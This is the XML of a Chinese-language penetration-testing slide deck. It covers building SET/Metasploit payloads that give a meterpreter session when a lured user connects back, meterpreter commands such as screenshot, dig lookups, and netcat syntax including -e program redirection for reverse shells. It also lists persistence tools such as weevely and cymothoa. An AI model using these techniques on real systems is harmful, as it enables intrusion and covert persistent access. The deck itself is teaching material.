            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545919" y="1812488"/>
            <a:ext cx="9912963" cy="6128624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="723" name="Shape 723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799038" y="355599"/>
            <a:ext cx="11406724"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>选择连接方式为4，创建一个payload和listener</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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5" name="Shape 725"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738559" y="685799"/>
            <a:ext cx="11406724"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>因为用于演示的系统为WinXP 32bit，因此选择连接方式为2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Shape 726"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896887" y="6281532"/>
            <a:ext cx="11090066"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>接着设置本机IP和端口（此处端口设置为4445，避免冲突即可）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Shape 727"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947688" y="8084932"/>
            <a:ext cx="10603546" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>接着SET将启动MSF并通过以上设置的payloads后，当用户被诱导并逆向连接本机4445端口时，将会得到一个meterpreter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="728" name="image117.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288522" y="1464775"/>
            <a:ext cx="8877828" cy="4596583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="729" name="image118.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014655" y="7060507"/>
            <a:ext cx="10469613" cy="544250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide10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1" name="Shape 731"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="609599"/>
            <a:ext cx="11406727"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>得到meterpreter后，可输入？查看可用命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="732" name="image119.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2425922" y="1124109"/>
            <a:ext cx="7063194" cy="3394640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Shape 733"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380998" y="4660899"/>
            <a:ext cx="11406727"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>例如screenshot截屏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="734" name="image120.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3747620" y="4660900"/>
            <a:ext cx="7510931" cy="558800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="735" name="image121.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2402538" y="5361851"/>
            <a:ext cx="7363647" cy="4347541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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 name="Shape 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721181" y="730249"/>
            <a:ext cx="792837"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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>dig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732948" y="1390649"/>
            <a:ext cx="6386786"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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用dig进行反向解析的命令格式为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>dig -x ip @dnsserver #用 dig 查看反向解析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="image12.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="765745" y="2888795"/>
            <a:ext cx="11828910" cy="5804810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 737"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933205" y="761999"/>
            <a:ext cx="2247901" cy="85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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="4200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>维持访问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Shape 738"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497012" y="1645574"/>
            <a:ext cx="10436822" cy="1844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l" defTabSz="914400">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>在获得了目标系统的访问权之后，攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>维持访问是一种艺术形式，思想比渗透更加重要。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Shape 739"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971304" y="3685711"/>
            <a:ext cx="19431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内容概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Shape 740"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059333" y="4618411"/>
            <a:ext cx="3825878" cy="2378524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cryptcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>weevely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>cymothoa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="Shape 742"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327650" y="504362"/>
            <a:ext cx="1317700" cy="571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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Netcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="Shape 743"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507962" y="1536699"/>
            <a:ext cx="11674948" cy="2387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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> NetCat是一个非常简单的Unix工具，可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具，能被其它的程序或脚本直接地或容易地驱动。同时，它又是一个功能丰富的网络调试和开发工具，因为它可以建立你可能用到的几乎任何类型的连接，以及一些非常有意思的内建功能。NetCat小巧且功能强大，可谓是居家旅行出门必备的“瑞士军刀”。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Shape 744"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952499" y="7912100"/>
            <a:ext cx="19431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实例演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Shape 745"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296967" y="8118012"/>
            <a:ext cx="6674939"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示NC反弹CMDShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Shape 746"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004859" y="6826250"/>
            <a:ext cx="10287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概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Shape 747"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263132" y="6904036"/>
            <a:ext cx="9392936"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="Shape 748"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540510" y="4524375"/>
            <a:ext cx="7258361" cy="193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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>一般我们使用netcat做的最多的事情为以下三种： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1、  扫描指定IP端口情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2、  端口转发数据（重点） </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3、  提交自定义数据包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="Shape 750"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872645" y="1454100"/>
            <a:ext cx="6869702" cy="2159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2500"/>
            </a:pPr>
            <a:r>
              <a:t>#连接到某处</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>netcat [-options] hostname port[s] [ports] …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>#监听端口等待连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>netcat -l -p port [-options] [hostname] [port]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751" name="Shape 751"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Shape 752"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273787" y="4619649"/>
            <a:ext cx="6553727" cy="421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2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-u </a:t>
            </a:r>
            <a:r>
              <a:t>                   UDP 模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-v   </a:t>
            </a:r>
            <a:r>
              <a:t>                 显示详细信息 [-vv更详细信息] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-w secs  </a:t>
            </a:r>
            <a:r>
              <a:t>        连接超时设置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-z </a:t>
            </a:r>
            <a:r>
              <a:t>                   I/O 模式 [扫描时使用]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-l              </a:t>
            </a:r>
            <a:r>
              <a:t>       监听入站信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-p port           </a:t>
            </a:r>
            <a:r>
              <a:t>打开本地端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-n                   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>以数字形式表示的IP地址</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Helvetica Light"/>
              <a:ea typeface="Helvetica Light"/>
              <a:cs typeface="Helvetica Light"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-t  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>                  以TELNET的形式应答入站请求</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Helvetica Light"/>
              <a:ea typeface="Helvetica Light"/>
              <a:cs typeface="Helvetica Light"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-e prog</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>          程序重定向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Shape 753"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884070" y="4165599"/>
            <a:ext cx="1402399"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#Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="Shape 755"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756" name="Shape 756"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524827" y="2578100"/>
            <a:ext cx="11650346" cy="4902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500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -v ip port</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】扫瞄某 IP 的某个端口，返回端口信息详细输出。</a:t>
            </a:r>
          </a:p>
